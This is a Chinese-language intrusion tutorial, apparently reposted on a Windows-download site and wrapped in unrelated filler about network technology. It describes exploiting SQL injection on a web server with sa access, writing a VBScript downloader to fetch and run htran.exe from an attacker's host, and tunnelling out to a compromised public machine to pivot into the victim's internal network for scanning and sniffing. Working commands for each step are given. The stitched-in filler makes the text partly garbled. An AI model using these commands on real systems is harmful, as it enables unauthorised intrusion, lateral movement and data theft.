|
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 一、踩点主机: http://www.baidu.com/ OS:Windows 2000 + IIS 5.0 + MSSQL 端口:80 21 数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网. 首页存在注入漏洞,sa登陆. 注入点: http://www.baidu.com/list.asp?id=1 二、入侵思路 1.给内网目标机装个代理服务器 2.把弄好的那个代理端口映到公网. 3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。 4.接下来就是找共享,嗅探,社会工程学等等了。 三、入侵准备 1.公网肉鸡一只:218.3.1.1 2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。 3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网) 4.A:192.168.1.2 B:218.3.1.1 C:www.baidu.com D:192.168.0.25 四、入侵进行时 1.工具上传: 在nbsi下执行: echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >down.vbs 然后下载工具: cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe 2.安装Socks5服务 在nbsi下执行: htran.exe -install //安装Socks5服务 htran.exe -start //启动Socks5服务 3.反弹进行时 在B上运行: htran.exe -s -listen 520 5200 //监听端口 在nbsi下执行:htran.exe -s -connect 218.3.1.1 520 3.进入内网 现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。 五、渗透内网 接下来就可以扫描,嗅探,等等,也就是后话了。 六、总结 文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
温馨提示:喜欢本站的话,请收藏一下本站!
本站发布的Win7纯净版系统、Win10纯净版和XP纯净版系统仅为个人学习测试使用,请在下载后24小时内删除,不得用于任何商业用途,否则后果自负,请支持购买微软正版软件!
本站所有资源全部来自于网络资源,如侵犯到您的权益,请及时通知我们(),我们会及时处理.
Copyright © 2018-2020 萝卜系统 手机站 关于本站
